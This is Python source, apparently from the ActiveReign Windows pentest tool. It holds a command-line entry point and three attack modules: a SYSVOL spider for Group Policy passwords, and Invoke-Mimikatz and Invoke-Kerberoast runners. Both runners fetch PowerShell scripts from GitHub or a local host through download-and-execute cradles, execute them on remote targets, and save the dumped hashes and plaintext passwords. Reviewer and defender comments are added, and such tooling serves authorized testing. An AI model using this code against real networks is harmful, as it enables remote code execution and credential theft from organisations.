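def main():
    """Parse the command line, prepare logging, workspace and database, then run the selected mode.

    The flow is: build the argument parser (global options plus one
    sub-parser per operational mode), create the console logger, load the
    configuration, resolve the workspace, create the per-mode file logger and
    the database handle, then hand over to ``ar3.ops.<mode>.main``.

    Exits with status 1 after printing help when too few command-line tokens
    were given, and with status 0 on Ctrl-C. Any other exception is printed
    and swallowed, so the process still ends with status 0 in that case.
    """
    main_parser = argparse.ArgumentParser(
        description=banner(),
        formatter_class=argparse.RawTextHelpFormatter,
        usage=argparse.SUPPRESS,
    )
    main_parser._optionals.title = 'Optional Arguments\n\033[1;30m>>-------------------->\033[1;m'
    main_parser.add_argument('-D', '--debug', dest="debug", action='store_true',
                             help='Show debug messages & failed login attempts')
    main_parser.add_argument('-T', dest='max_threads', type=int, default=75,
                             help='Max number of threads to use')
    main_parser.add_argument('--host-max', dest='max_host_threads', type=int, default=20,
                             help='Max threads per host')
    main_parser.add_argument('-W', dest='workspace', type=str, default='', required=False,
                             help='Manually set workspace, otherwise defaults to config file')

    sub_parser = main_parser.add_subparsers(
        title=' \nOperational Modes\n\033[1;30m>>-------------------->\033[1;m',
        dest='mode',
    )
    db_args(sub_parser)
    enum_args(sub_parser)
    shell_args(sub_parser)
    spray_args(sub_parser)
    query_args(sub_parser)

    args = main_parser.parse_args()
    if len(argv) <= 2:
        main_parser.print_help()
        exit(1)

    log_level = logging.DEBUG if args.debug else logging.INFO

    # Console logger first: the start-up checks below report through it.
    loggers = {'console': setup_logger(log_level, 'ar3')}

    # First-run checks and configuration load.
    first_run_check(loggers['console'])
    config_obj = ConfigLoader()
    if not args.workspace:
        args.workspace = config_obj.WORKSPACE
    first_workspace_check(args.workspace, loggers['console'])

    # One file logger per operational mode.
    loggers[args.mode] = setup_file_logger(args.workspace, args.mode)

    # Secondary loggers are keyed off raw argv because the per-mode argument
    # post-processing has not run yet at this point.
    if '--spider' in argv:
        loggers['spider'] = setup_file_logger(args.workspace, "spider")
    if '--gen-relay-list' in argv:
        loggers['relay_list'] = setup_file_logger(args.workspace, "relay_list")

    db_obj = Ar3db(args.workspace, loggers['console'], args.debug)

    try:
        # Resolve the "<mode>_arg_mods" handler by name instead of building a
        # source string for eval(). The mode value is produced by the
        # sub-parser's dest, but eval() would execute whatever expression that
        # string became if the value were ever sourced differently; a plain
        # lookup can only ever call an existing callable.
        # NOTE(review): assumes the *_arg_mods functions are module-level
        # names in this file (their imports are not visible here) - confirm.
        arg_mods = globals().get("{}_arg_mods".format(args.mode))
        if not callable(arg_mods):
            raise ValueError("Unsupported mode: {}".format(args.mode))
        args = arg_mods(args, db_obj, loggers)

        if args.debug:
            print_args(args, loggers['console'])

        ops = import_module("ar3.ops.{}".format(args.mode))
        ops.main(args, config_obj, db_obj, loggers)
    except KeyboardInterrupt:
        print("\n[!] Key Event Detected, Closing...")
        exit(0)
    except Exception as e:
        print("[!] ActiveReign Error: {}".format(str(e)))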
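def run(self, target, args, smb_con, loggers, config_obj):
    """Spider the SYSVOL share for XML files matching the ``gpp_password`` pattern.

    Args:
        target: Host whose SYSVOL share is searched; replaced by the module's
            ``DC`` option when that option is set.
        args: Parsed arguments. ``max_depth`` and ``spider`` are overwritten
            on this object (see the note below).
        smb_con: Connection object; ``host``, ``ip`` and ``db`` are read.
        loggers: Logger mapping; a ``'spider'`` entry is (re)created here.
        config_obj: Loaded configuration, used as the template for the
            spider settings.

    Defender note: SYSVOL is readable by every authenticated domain account,
    so credential material left in policy XML files there should be treated
    as exposed - remove the files and rotate the affected passwords.
    """
    import copy  # local import: the file's import block is not visible here

    self.count = 0
    if self.args['DC']['Value']:
        target = self.args['DC']['Value']

    # Work on a shallow copy. The original bound temp_config to config_obj
    # itself, so the overrides below replaced the caller's extension,
    # keyword and regex settings for everything that used the same
    # configuration object afterwards. A shallow copy is enough because the
    # attributes are rebound, not mutated in place.
    temp_config = copy.copy(config_obj)
    temp_config.WHITELIST_EXT = ['xml']
    temp_config.KEY_EXT = []
    temp_config.KEY_WORDS = []
    # NOTE(review): the pattern is shown as "******" on this page, which looks
    # masked; it would not compile with Python's re module - confirm the real
    # value against the upstream file.
    temp_config.REGEX = {"gpp_password": "******"}

    # NOTE(review): these overrides still modify the caller's args object;
    # whether it is shared with other modules or hosts is not visible here.
    setattr(args, 'max_depth', 12)
    setattr(args, 'spider', False)

    loggers['spider'] = setup_file_logger(args.workspace, "spider")

    loggers['console'].info([
        smb_con.host,
        smb_con.ip,
        "GPP_PASSWORD",
        "Searching \\\\{}\\SYSVOL\\".format(target),
    ])
    spider(args, temp_config, loggers, smb_con.db, target, 'SYSVOL')
    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Module complete"])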
def run(self, target, args, smb_con, loggers, config_obj):
    """Run Invoke-Mimikatz on the target, store parsed credentials, and save the raw output.

    The script is referenced either from this host over plain HTTP
    (``args.fileless``) or from the EmpireProject ``master`` branch on
    raw.githubusercontent.com. Output is parsed with ``self.parse_mimikatz``;
    ``hash`` and ``plaintext`` entries are written to ``smb_con.db`` and
    echoed to the console, and the full output goes to a file logger in the
    workspace.

    Security notes for operators and reviewers:
      * The remote URL tracks a branch, not a fixed revision, and nothing in
        this block verifies the script's integrity, so whatever that URL
        serves at run time is what gets executed on the target.
      * Recovered secrets are printed in clear text and stored unencrypted in
        the database and in the output file; the workspace holds live
        credentials and needs matching access control and clean-up.
      * NOTE(review): ``args.timeout`` is raised and never restored. If the
        same ``args`` object is reused across calls the timeout grows on each
        run - confirm against the caller.
    """
    console = loggers['console']
    base_timeout = args.timeout

    def row(message):
        # Build a fresh [host, ip, MODULE, message] record for every log call.
        return [smb_con.host, smb_con.ip, self.name.upper(), message]

    console.info(row('Attempting Invoke-Mimikatz'))

    try:
        # Pick the script source and extend the timeout to cover the fetch.
        if args.fileless:
            script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(get_local_ip())
            args.timeout = base_timeout + 60
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            args.timeout = base_timeout + 25
        console.debug('Script source: {}'.format(script_location))

        # Build the PowerShell launcher around the operator-supplied command.
        ps_call = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
        launcher = powershell.gen_ps_iex_cradle(script_location, ps_call)

        try:
            ps_command = powershell.create_ps_command(
                launcher,
                console,
                force_ps32=args.force_ps32,
                no_obfs=args.no_obfs,
                server_os=smb_con.os,
            )
            results = code_execution(smb_con, args, target, loggers, config_obj,
                                     ps_command, return_data=True)

            if not results:
                console.fail(row('No output returned'))
                return
            if args.debug:
                for output_line in results.splitlines():
                    console.debug(row(output_line))

            # Store parsed credentials; entries of any other kind are skipped.
            db_updates = 0
            for cred in self.parse_mimikatz(results):
                kind = cred[0]
                # presumably update_user takes (user, password, domain, hash);
                # verify against the database class.
                if kind == "hash":
                    plain_value, hash_value = '', cred[3]
                elif kind == "plaintext":
                    plain_value, hash_value = cred[3], ''
                else:
                    continue
                smb_con.db.update_user(cred[2], plain_value, cred[1], hash_value)
                console.success(row("{}\\{}:{}".format(cred[1], cred[2], cred[3])))
                db_updates += 1
            console.info(row("{} credentials updated in database".format(db_updates)))

            # Keep the raw tool output in the workspace.
            file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
            output_logger = setup_file_logger(args.workspace, file_name, ext='')
            output_logger.info(results)
            console.info(row("Output saved to: {}".format(file_name)))
        except Exception as e:
            # An index error while handling the output is reported as a
            # generic module failure; anything else is shown verbatim.
            detail = str(e)
            if detail == "list index out of range":
                detail = "{} failed".format(self.name)
            console.fail(row(detail))
    except Exception as e:
        console.debug("{} Error: {}".format(self.name, str(e)))
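def run(self, target, args, smb_con, loggers, config_obj):
    """Run Invoke-Kerberoast on the target, print each output line, and save the output.

    The script is referenced either from this host over plain HTTP
    (``args.fileless``) or from the EmpireProject ``master`` branch on
    raw.githubusercontent.com.

    Security notes for operators and reviewers:
      * The remote URL tracks a branch, not a fixed revision, and nothing in
        this block verifies the script's integrity.
      * The output is written unencrypted to a file in the workspace; treat
        that directory as sensitive.
      * NOTE(review): ``args.timeout`` is raised and never restored. If the
        same ``args`` object is reused across calls the timeout grows on each
        run - confirm against the caller.
    """
    logger = loggers['console']
    timeout = args.timeout

    def row(message):
        # Build a fresh [host, ip, MODULE, message] record for every log call.
        return [smb_con.host, smb_con.ip, self.name.upper(), message]

    logger.info(row('Attempting Invoke-Kerberoast'))

    try:
        # Pick the script source and extend the timeout to cover the fetch.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(srv_addr)
            setattr(args, 'timeout', timeout + 30)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
            setattr(args, 'timeout', timeout + 15)
        logger.debug('Script source: {}'.format(script_location))

        launcher = powershell.gen_ps_iex_cradle(script_location, '')
        cmd = powershell.create_ps_command(
            launcher,
            logger,
            force_ps32=args.force_ps32,
            no_obfs=args.no_obfs,
            server_os=smb_con.os,
        )
        output = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

        # Report an empty result explicitly. Previously a None result raised
        # AttributeError on .splitlines(), which surfaced only at debug level,
        # and an empty string produced an empty output file.
        if not output:
            logger.fail(row('No output returned'))
            return

        for line in output.splitlines():
            logger.success(row(line))

        # Keep the raw output in the workspace.
        file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
        tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
        tmp_logger.info(output)
        logger.info(row("Output saved to: {}".format(file_name)))
    except Exception as e:
        logger.debug("{} Error: {}".format(self.name, str(e)))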